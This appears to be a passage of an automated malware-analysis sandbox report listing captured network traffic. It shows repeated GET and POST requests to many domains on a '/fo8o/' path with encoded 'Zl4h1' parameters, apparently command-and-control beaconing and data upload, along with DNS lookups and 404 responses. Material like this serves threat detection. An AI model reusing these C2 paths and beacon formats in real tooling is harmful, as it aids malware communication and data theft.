Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa481lrDHTJpcFWPIOqV4sO7fmSS56YSbpU=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.techchains.info | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.elettrosistemista.zip | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThuOdW8gsoVxhB1RUuBib7W4ojAwcpXLMk0=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.donnavariedades.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/DTXti4BJBda4ZDKyYIpNZZRE2pdJDqsa0=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.660danm.top | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.empowermedeco.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.shenzhoucui.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBck89gksl+IJQQsBNVEJ3Y46WCh4jtmLfecQ=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.b301.space | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.3xfootball.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic | DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic | DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic | DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic | DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic | DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic | DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic | DNS traffic detected: DNS query: www.techchains.info
Source: global traffic | DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic | DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic | DNS traffic detected: DNS query: www.660danm.top
Source: global traffic | DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic | DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic | DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic | DNS traffic detected: DNS query: www.shenzhoucui.com
Source: global traffic | DNS traffic detected: DNS query: www.b301.space
Source: unknown | HTTP traffic detected: POST /fo8o/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Accept-Encoding: gzip, deflate, br | Host: www.kasegitai.tokyo | Origin: http://www.kasegitai.tokyo | Cache-Control: no-cache | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 202 | Referer: http://www.kasegitai.tokyo/fo8o/ | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) | Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 65 32 4f 76 2f 78 70 73 6d 4c 4d 41 46 48 55 74 45 6a 32 6f 50 6a 43 64 33 45 42 51 62 2f 41 4c 52 41 3d 3d | Data Ascii: Zl4h1=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmfe2Ov/xpsmLMAFHUtEj2oPjCd3EBQb/ALRA==
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 09 Jun 2024 15:59:50 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 09 Jun 2024 16:00:06 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 09 Jun 2024 16:00:09 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:00:12 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:00:14 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 09 Jun 2024 16:00:49 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 17X-Rate-Limit-Reset: 2024-06-09T16:00:50.2799408Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 09 Jun 2024 16:00:52 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-06-09T16:00:55.3357885Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 09 Jun 2024 16:00:54 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 17X-Rate-Limit-Reset: 2024-06-09T16:00:55.3357885Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 09 Jun 2024 16:00:57 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-06-09T16:00:57.8280283Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:25 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:28 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:30 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:33 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 